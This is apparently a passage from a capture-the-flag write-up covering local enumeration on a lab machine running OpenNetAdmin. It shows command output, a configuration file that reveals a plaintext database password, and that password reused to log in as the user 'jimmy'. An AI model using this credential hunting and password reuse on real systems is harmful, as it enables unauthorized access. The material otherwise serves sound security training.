4 manual enum > jimmy

[+] MySQL version
mysql  Ver 14.14 Distrib 5.7.28, for Linux (x86_64) using  EditLine wrapper

[+] Searching mysql credentials and exec
From '/etc/mysql/mysql.conf.d/mysqld.cnf' Mysql user: user = mysql
Found readable /etc/mysql/my.cnf
!includedir /etc/mysql/conf.d/
!includedir /etc/mysql/mysql.conf.d/


[+] Web files?(output limit)
/var/www/:
total 16K
drwxr-xr-x  4 root     root     4.0K Nov 22  2019 .
drwxr-xr-x 14 root     root     4.0K Nov 21  2019 ..
drwxr-xr-x  6 www-data www-data 4.0K Nov 22  2019 html
drwxrwx---  2 jimmy    internal 4.0K Nov 23  2019 internal
lrwxrwxrwx  1 www-data www-data   12 Nov 21  2019 ona -> /opt/ona/www

drwxrwxr-x 8 www-data www-data 4096 Nov 22  2019 /var/www/html/marga/.git
			 www-data 271 Sep 30  2019 /var/www/html/marga/.git/config

Didnt find anything, so searching where the config file of openNetAdmin is located

Using Google

locate config.inc.php
/opt/ona/www/config/config.inc.php

cat /opt/ona/www/config/config.inc.php
=redacted=
$dbconffile = "{$base}/local/config/database_settings.inc.php";
=redacted=

locate database_settings.inc.php
/opt/ona/www/local/config/database_settings.inc.php

cat /opt/ona/www/local/config/database_settings.inc.php
</opt/ona/www/local/config/database_settings.inc.php
<?php

$ona_contexts=array (
  'DEFAULT' =>
  array (
    'databases' =>
    array (
      0 =>
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
      ),
    ),
    'description' => 'Default data context',
    'context_color' => '#D3DBFF',
  ),
);

Tried mysql login via cli using ona_sys:n1nj4W4rri0R!
Nothing in the tables.

Using jimmy:n1nj4W4rri0R! works
whoami;id
jimmy
uid=1000(jimmy) gid=1000(jimmy) groups=1000(jimmy),1002(internal)

Previous5 jimmy > joanna Next3 openNetAdmin 18.1.1

Last updated 4 years ago